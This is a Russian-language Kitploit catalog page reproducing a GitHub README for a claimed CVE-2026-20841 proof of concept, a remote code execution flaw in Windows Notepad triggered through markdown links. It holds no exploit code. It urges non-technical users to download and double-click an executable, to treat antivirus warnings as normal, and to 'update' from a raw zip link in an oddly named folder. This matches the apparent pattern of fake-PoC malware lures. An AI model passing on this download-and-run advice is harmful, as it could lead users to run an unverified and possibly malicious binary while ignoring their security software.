Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20841 — 🛠 Демонстрация удаленного выполнения кода в Блокноте Windows через markdown-ссылки, эксплуатирующие незащищенные протоколы URL. | Kitploit
Инструменты/GitHubGitHub/hamzamalik3461/cve-2026-20841
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubhamzamalik3461/cve-2026-20841

CVE-2026-20841

🛠 Демонстрация удаленного выполнения кода в Блокноте Windows через markdown-ссылки, эксплуатирующие незащищенные протоколы URL.

Репозиторий
12212 ч 34 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2026-20841 - Инструмент тестирования безопасности Блокнота Windows

Download Releases

⚠️ Что такое CVE-2026-20841?

CVE-2026-20841 — известная уязвимость в приложении Блокнот Windows. Она затрагивает функцию Markdown, которая позволяет Блокноту отображать форматированный текст с кликабельными ссылками. Эта уязвимость возникает из-за того, что движок Markdown внутри Блокнота не ограничивает типы ссылок (называемые протоколами URL), которые он разрешает. Это означает, что злоумышленник может создать ссылку, при нажатии на которую Блокнот запускает программы или команды, не предназначенные пользователем.

Этот инструмент предоставляет доказательство концепции (PoC) для демонстрации работы этой уязвимости. Он помогает исследователям безопасности и техническим специалистам понять, как работает уязвимость, и проверить, подвержены ли системы риску.

💻 Кому следует использовать этот инструмент?

Этот проект предназначен для людей, которые хотят:

  • Понять опасность CVE-2026-20841 в Блокноте Windows
  • Проверить, уязвимы ли их системы к этой проблеме безопасности
  • Улучшить меры безопасности против атак удаленного выполнения кода

Для запуска этого программного обеспечения не требуются навыки программирования. Оно лучше всего подходит для ИТ-специалистов или любознательных пользователей, желающих проверить свои устройства с Windows.

🚀 Начало работы

Системные требования

Прежде чем использовать это программное обеспечение, убедитесь, что ваш компьютер соответствует следующим требованиям:

  • Windows 10 или более поздние версии
  • Установленное приложение Блокнот (входит в состав Windows по умолчанию)
  • Подключение к Интернету для загрузки файлов
  • Достаточно места на диске для загрузки (менее 10 МБ)

Необходимые разрешения

Инструмент тестирования может запросить разрешение на запуск программ на вашем ПК. Вы можете увидеть предупреждения Защитника Windows или антивируса. Это нормально, так как инструмент имитирует работу реальных атак.

Запускайте инструмент только на компьютерах, которыми вы владеете или на которые у вас есть разрешение на тестирование.

📥 Загрузка и установка

Чтобы получить программное обеспечение, выполните следующие действия:

  1. Перейдите на страницу релизов.
    Нажмите эту большую кнопку, чтобы перейти в область загрузок:
    Download Releases

  2. Выберите последний релиз на странице.
    Найдите файл, подходящий для вашей системы (обычно это .exe или .zip файл).

  3. Загрузите файл.
    Нажмите на ссылку с именем файла, чтобы начать загрузку.

  4. Запустите или распакуйте программное обеспечение.

  • Если это .exe файл, дважды щелкните по нему для запуска.
  • Если это .zip файл, щелкните правой кнопкой мыши и выберите «Извлечь все», затем откройте папку и дважды щелкните по .exe внутри.
  1. Следуйте инструкциям на экране.
    Программное обеспечение проведет вас через процесс тестирования.

🧭 Как использовать программное обеспечение

После установки вы увидите простое окно с инструкциями. Вот как действовать:

  • Шаг 1: Начните тест, нажав кнопку «Запустить тест».
  • Шаг 2: Программа смоделирует файл Markdown со специальными ссылками.
  • Шаг 3: Она покажет, разрешает ли ваш Блокнот небезопасные кликабельные ссылки.
  • Шаг 4: Просмотрите отчет о тесте внутри приложения или в файле на рабочем столе.

🔍 Что делает этот тест?

Инструмент создает поддельный файл Markdown, содержащий ссылки, использующие необычные обработчики URL. Обычно такие ссылки не должны открывать программы без разрешения. Но из-за CVE-2026-20841 Блокнот их не блокирует.

Когда вы запускаете тест, программа пытается открыть эти ссылки в Блокноте. Если это удается, Блокнот уязвим и может позволить злоумышленникам запускать вредоносный код.

🛠 Функции

  • Простой запуск теста в один клик
  • Понятный отчет, показывающий, затронута ли ваша система
  • Простой пользовательский интерфейс, разработанный для неспециалистов
  • Поддержка последних версий Windows
  • Небольшой размер загрузки

🔄 Как обновить

Чтобы сохранить точность тестирования, загружайте новые версии по мере их появления:

  1. Снова посетите ту же страницу релизов:
    https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip
  2. Найдите самую новую версию вверху.
  3. Загрузите и запустите новый файл, как описано в разделе загрузки.

👥 Получение помощи и поддержки

Если у вас возникли проблемы, вы можете:

  • Проверить вкладку «Issues» на странице GitHub, чтобы узнать, есть ли у других такая же проблема
  • Использовать страницу «Discussions» для вопросов и ответов
  • Найти контактную информацию разработчиков на главной странице репозитория

🔒 Будьте в безопасности

Этот инструмент показывает, как хакеры могут использовать уязвимости. Используйте его ответственно:

  • Не используйте на устройствах, которыми вы не владеете или на которые у вас нет разрешения на тестирование.
  • Всегда обновляйте ваше программное обеспечение, включая Windows.
  • Избегайте нажатия на подозрительные ссылки в неизвестных файлах или электронных письмах.

🗂 Связанные темы

Этот проект связан с:

  • Исследования безопасности Блокнота Windows
  • Уязвимости внедрения команд
  • Риски удаленного выполнения кода (RCE)
  • Осведомленность в области кибербезопасности
  • Инструменты тестирования уязвимостей

Вы можете начать тестирование сейчас, посетив страницу загрузок:
Download CVE-2026-20841 Tool

Скачать инструмент